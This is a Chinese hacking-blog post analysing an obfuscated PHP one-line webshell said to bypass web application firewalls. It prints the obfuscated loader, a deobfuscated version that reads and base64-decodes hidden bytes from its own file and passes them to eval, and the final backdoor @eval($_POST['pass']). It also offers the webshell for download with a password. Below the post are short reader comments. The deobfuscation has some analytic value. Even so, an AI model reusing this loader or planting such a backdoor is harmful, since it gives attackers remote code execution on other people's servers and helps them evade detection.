一款过waf的一句话木马分析

  • 内容
  • 相关

中午,下班回来,就看一个朋友给我发了几个马儿  让我看看解解密码  很简单

1.png2.png


猛不猛我不知道   那时候手机  太长的看着就烦   就回到家瞅瞅了

首先我们看这个马儿


4.png

一步步来,先分析前面的。前面的PHP代码部分有一个eval,我们改成echo试试

5.png

输出得到


$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};$OO0OO000O($O000O0O00,1136);$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);
替换进去得到


6.png

下来我们就要分析了


<?php
$OOO0O0O00=__FILE__;
//$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OOO000000='th6sbehqla4co_sadfpnr';

$OO00O0000=248;

//$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
//$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
//$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$OOO0000O0='base64_decode';

$O0O0000O0='OOO0000O0';

//$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};
$OO0OO0000='fopen';

//if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');
$O000O0O00=fopen($OOO0O0O00,'rb');

//$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$OO0OO000O=='fread';

//$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};
$OO0OO00O0='strtr';

//$OO0OO000O($O000O0O00,1136);
fread($O000O0O00,1136);

/*$OO00O00O0=($OOO0000O0(
    $OO0OO00O0(
	            $OO0OO000O($O000O0O00,380),
				'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
				'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
				)
			)
);*/

$OO00O00O0=(base64_decode(
	strtr(
		$OO0OO000O($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);


;eval($OO00O00O0);
return;
?>
分析后总结得到



$OOO0O0O00=__FILE__;//获取当前文件名
$O000O0O00=fopen($OOO0O0O00,'rb');//打开文件
fread($O000O0O00,248);//跳过248字节
$OO00O00O0=(base64_decode(
	strtr(
		fread($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);//读取380字节,根据代码表替换字符,base64解码
eval($OO00O00O0);//执行解码后的代码
10.png



解得


@eval($_POST['pass']);//密码就等于pass

怎么解得卖个关子  不会的可以看看

管理员设置 回复 可见隐藏内容




  文件名稱:一句话木马

  更新時間:

  下載声明:密码: gadu

立即下載

下载链接

网盘下载

密码: gadu

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:一款过waf的一句话木马分析 - https://www.0dayhack.com/post-836.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

31条评论
  1. avatar

    HulkDon Lv.1 Chrome 75.0.3770.80 Chrome 75.0.3770.80 Mac OS X 10.14.5 Mac OS X 10.14.5 回复

    66学习一下

    江西省赣州市 移动

    1. avatar

      HulkDon Lv.1 Chrome 75.0.3770.80 Chrome 75.0.3770.80 Mac OS X 10.14.5 Mac OS X 10.14.5 回复

      学习学习学习

      江西省 移动

      1. avatar

        HulkDon Lv.1 Chrome 75.0.3770.80 Chrome 75.0.3770.80 Mac OS X 10.14.5 Mac OS X 10.14.5 回复

        学习学习

        江西省 移动

        1. avatar

          手术室 Lv.1 Chrome 74.0.3729.169 Chrome 74.0.3729.169 Mac OS X 10.14.3 Mac OS X 10.14.3 回复

          kankan啊

          江西省南昌市 电信

          1. avatar

            p4ssw0rd Lv.1 Firefox 67.0 Firefox 67.0 Mac OS X 10.14 Mac OS X 10.14 回复

            师傅也 tql 吧

            天津市 移动

            1. avatar

              p4ssw0rd Lv.1 Firefox 67.0 Firefox 67.0 Mac OS X 10.14 Mac OS X 10.14 回复

              师傅太强了

              天津市 移动

                1. avatar

                  牧~师 Lv.1 Firefox 64.0 Firefox 64.0 Windows Windows 回复

                  666学习一下

                  山东省 电信

                  1. avatar

                    2222 Lv.1 Chrome 68.0.3440.106 Chrome 68.0.3440.106 Windows Windows 回复

                    看看

                    山西省 电信

                    1. avatar

                      A Lv.1 Firefox 62.0 Firefox 62.0 Windows Windows 回复

                      还是要看看

                      广东省佛山市 电信